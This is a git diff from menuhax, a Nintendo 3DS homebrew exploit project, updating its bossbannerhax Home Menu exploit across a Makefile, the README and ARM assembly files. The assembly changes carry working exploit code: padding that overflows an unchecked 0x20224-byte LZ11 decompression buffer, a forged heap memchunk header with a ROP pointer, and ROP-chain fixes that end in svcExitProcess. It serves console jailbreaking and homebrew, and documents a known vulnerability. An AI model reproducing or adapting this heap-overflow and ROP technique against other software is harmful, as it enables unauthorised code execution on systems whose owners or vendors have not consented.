diff --git a/Makefile.bossbannerhax b/Makefile.bossbannerhax index 6555af8..99f87f9 100644 --- a/Makefile.bossbannerhax +++ b/Makefile.bossbannerhax @@ -23,8 +23,8 @@ buildbossbannerhax: @make -f Makefile finaloutput/bossbannerhax/$(BUILDPREFIX)$(REGION)$(MENUVERSION)_new3ds_bossbannerhax.bin --no-print-directory BUILDPREFIX=$(BUILDPREFIX)$(REGION)$(MENUVERSION)_new3ds MENUVERSION=$(MENUVERSION) HEAPBUF_OBJADDR=$(HEAPBUF_HAX_NEW3DS) HEAPBUF=0x38f5c900 FIXHEAPBUF=$(HEAPBUF_HAX_NEW3DS) ROPBIN_BUFADR=$(HEAPBUF_ROPBIN_NEW3DS) NEW3DS=1 BOSSPROGRAMID=000400102$(BOSSPROGRAMID) BOSSTOOLPARAMS=$(BOSSTOOLPARAMS) $(PARAMS) build_stage1_bossbannerhax: - @make -f Makefile finaloutput/stage1_bossbannerhax/$(BUILDPREFIX)$(REGION)$(MENUVERSION)_old3ds.bin --no-print-directory BUILDPREFIX=$(BUILDPREFIX)$(REGION)$(MENUVERSION)_old3ds MENUVERSION=$(MENUVERSION) HEAPBUF_OBJADDR=$(HEAPBUF_OBJADDR_OLD3DS) HEAPBUF=0x0FFF1000 FIXHEAPBUF=$(HEAPBUF_HAX_OLD3DS) ROPBIN_BUFADR=$(HEAPBUF_ROPBIN_OLD3DS) NEW3DS=0 $(PARAMS) - @make -f Makefile finaloutput/stage1_bossbannerhax/$(BUILDPREFIX)$(REGION)$(MENUVERSION)_new3ds.bin --no-print-directory BUILDPREFIX=$(BUILDPREFIX)$(REGION)$(MENUVERSION)_new3ds MENUVERSION=$(MENUVERSION) HEAPBUF_OBJADDR=$(HEAPBUF_OBJADDR_NEW3DS) HEAPBUF=0x0FFF1000 FIXHEAPBUF=$(HEAPBUF_HAX_NEW3DS) ROPBIN_BUFADR=$(HEAPBUF_ROPBIN_NEW3DS) NEW3DS=1 $(PARAMS) + @make -f Makefile finaloutput/stage1_bossbannerhax/$(BUILDPREFIX)$(REGION)$(MENUVERSION)_old3ds.bin --no-print-directory BUILDPREFIX=$(BUILDPREFIX)$(REGION)$(MENUVERSION)_old3ds MENUVERSION=$(MENUVERSION) HEAPBUF_OBJADDR=$(HEAPBUF_OBJADDR_OLD3DS) HEAPBUF=0x0FFF1000 FIXHEAPBUF=0x3535c900 ROPBIN_BUFADR=$(HEAPBUF_ROPBIN_OLD3DS) NEW3DS=0 $(PARAMS) + @make -f Makefile finaloutput/stage1_bossbannerhax/$(BUILDPREFIX)$(REGION)$(MENUVERSION)_new3ds.bin --no-print-directory BUILDPREFIX=$(BUILDPREFIX)$(REGION)$(MENUVERSION)_new3ds MENUVERSION=$(MENUVERSION) HEAPBUF_OBJADDR=$(HEAPBUF_OBJADDR_NEW3DS) HEAPBUF=0x0FFF1000 FIXHEAPBUF=0x38f5c900 ROPBIN_BUFADR=$(HEAPBUF_ROPBIN_NEW3DS) NEW3DS=1 $(PARAMS) finaloutput/bossbannerhax/$(BUILDPREFIX)_bossbannerhax.bin: binpayload/$(BUILDPREFIX)_bossbannerhax.cbmd bosstool --input=$< --output=$@ --programID=$(BOSSPROGRAMID) --build --nsdataid=0x58484e42 --datatype=0x40001 $(BOSSTOOLPARAMS) diff --git a/README.md b/README.md index 71cf85d..3eff9ec 100644 --- a/README.md +++ b/README.md @@ -45,6 +45,8 @@ Do not change the system language with System Settings with sdiconhax installed. # Usage notes for bossbannerhax This does not trigger during Home Menu boot. This triggers when the Face Raiders icon is selected by the user, which triggers loading the exbanner data(Face Raiders is just the ideal target title for this among the system titles with exbanner-usage enabled). +Normal {return to homemenu code} is not supported with bossbannerhax. It will terminate Home Menu via svcExitProcess instead, resulting in the usual crash message. This doesn't matter much since the exploit only triggers when selecting the icon listed above. + # Supported System Versions As of menuhax v3.2, system-versions 9.0.0-X..11.2.0-X are all supported. During installation it automatically detects which exploit to install. See also the above sections. Note that as of November 2016 [bossbannerhax](https://www.3dbrew.org/wiki/3DS_Userland_Flaws) was the last known Home Menu vuln. @@ -65,6 +67,8 @@ If the menuhax-thread options are setup via the menuhax_manager configuration me This thread executes a loop. First it runs svcSleepThread, delaying with the user-specified value. Then it verifies that Home Menu is active by comparing the GSPGPU service session handle with 0x0. Then it checks if the pressed PAD buttons match the value specified in config. If so, the config file is updated so that menuhax automatically boots \*hax payload on next boot, then svcExitProcess is executed so that Home Menu restarts. +This is not usable with bossbannerhax due to no ret2menu. + # Installation To install menuhax you must use the menuhax_manager app. You must already have a way to boot into the \*hax payload for running this app(which can include menuhax if it's already setup): https://www.3dbrew.org/wiki/Homebrew_Exploits diff --git a/bossbannerhax_banner.s b/bossbannerhax_banner.s index 03fef4a..40ebf02 100644 --- a/bossbannerhax_banner.s +++ b/bossbannerhax_banner.s @@ -57,5 +57,19 @@ ropstackstart: #include "menuhax_loader.s" @ When decompressing exbanners from the BOSS CBMD, Home Menu doesn't validate the decompressed-size from the LZ11 header. The buffer size is 0x20224-bytes. Hence, the below triggers a buffer overflow. Only the last word here actually triggers a crash when invalid, or at least immediately. -.fill (((_start + 0x20224+0x24) - .) / 4), 4, ROPBUFLOC(object+0x20) +.space ((_start + 0x20224) - .) + +@ Start of DU memchunk(CTRSDK-heap memchunkhdr for allocated mem). +.word 0x5544 @ magicnum +.word 0x50 @ size +.word ROPBUF-0x10 @ prev memchunk +.word ROPBUF+0x20224+0x10+0x50 @ next memchunk + +@ Start of the allocated mem. +.word 0 @ vtable ptr +.word 0 @ .data/.bss ptr +.word 0 @ regular-heap ptr +.word 0 @ Actually zero in the original data. + +.word ROPBUFLOC(object+0x20) diff --git a/stage1_bossbannerhax.s b/stage1_bossbannerhax.s index 788ec6c..afe85d9 100644 --- a/stage1_bossbannerhax.s +++ b/stage1_bossbannerhax.s @@ -19,10 +19,15 @@ ROPMACRO_WRITEWORD BOSSBANNERHAX_SPRETADDR-(3*4), ROP_LOADR4_FROMOBJR0_CALLERFUN ROPMACRO_WRITEWORD BOSSBANNERHAX_SPRETADDR-(2*4), 0x1 @ fp value ROPMACRO_WRITEWORD BOSSBANNERHAX_SPRETADDR-(1*4), POP_R4R8PC +@ Copy the ptr from +0x14 to +0x10. This restores the word overwritten at the end of bossbannerhax_banner.s. +ROPMACRO_COPYWORD FIXHEAPBUF+0x20224+0x10+0x10, FIXHEAPBUF+0x20224+0x10+0x14 + #include "menuhax_loader.s" @ The ROP used for RET2MENU starts here. +.word MAINLR_SVCEXITPROCESS @ Can't really ret2menu since there's some data that (probably) can't be restored properly. And also the exploit will trigger again the next time the user selects the application icon, which triggers another crash. + ROPMACRO_STACKPIVOT BOSSBANNERHAX_SPRETADDR-(9*4), POP_R4FPPC @ Return to executing the original homemenu code. menuhaxloader_beforethreadexit: